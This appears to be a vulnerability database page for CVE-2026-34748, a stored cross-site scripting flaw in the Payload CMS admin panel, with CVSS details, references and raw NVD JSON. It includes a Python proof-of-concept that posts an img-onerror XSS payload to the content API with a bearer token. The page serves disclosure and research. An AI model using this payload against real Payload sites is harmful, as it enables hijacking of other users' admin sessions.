CVE-2026-34748

Description

Payload is a free and open source headless content management system. Prior to version 3.78.0 in @payloadcms/next, a stored Cross-Site Scripting (XSS) vulnerability existed in the admin panel. An authenticated user with write access to a collection could save content that, when viewed by another user, would execute in their browser. This issue has been patched in version 3.78.0.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:* - VULNERABLE

@payloadcms/next < 3.78.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-34748 (Stored XSS)
# This script demonstrates how an authenticated user might inject a payload.

import requests

# Configuration
TARGET_URL = "http://localhost:3000/api/pages" # Example endpoint
API_TOKEN = "your_valid_jwt_token"

# Headers
headers = {
    "Authorization": f"Bearer {API_TOKEN}",
    "Content-Type": "application/json"
}

# Malicious Payload construction
# Using an img tag with onerror is a common bypass for simple filters
malicious_content = "<img src=x onerror=alert('CVE-2026-34748-XSS')>"

payload_data = {
    "title": "Test Document",
    "content": malicious_content
}

try:
    # Send POST request to store the payload
    response = requests.post(TARGET_URL, json=payload_data, headers=headers)
    
    if response.status_code == 200 or response.status_code == 201:
        print("[+] Payload injected successfully!")
        print("[+] Navigate to the admin panel to view the collection item and trigger the XSS.")
    else:
        print(f"[-] Injection failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34748
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34748
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34748/
[4] VulDB https://vuldb.com/cve/CVE-2026-34748
[5] https://github.com/payloadcms/payload/security/advisories/GHSA-mmxc-95ch-2j7c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34748", "sourceIdentifier": "[email protected]", "published": "2026-04-01T20:16:27.040", "lastModified": "2026-04-13T19:13:21.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Payload is a free and open source headless content management system. Prior to version 3.78.0 in @payloadcms/next, a stored Cross-Site Scripting (XSS) vulnerability existed in the admin panel. An authenticated user with write access to a collection could save content that, when viewed by another user, would execute in their browser. This issue has been patched in version 3.78.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.78.0", "matchCriteriaId": "225E9788-C205-479C-B3EE-7A57A468929F"}]}]}], "references": [{"url": "https://github.com/payloadcms/payload/security/advisories/GHSA-mmxc-95ch-2j7c", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}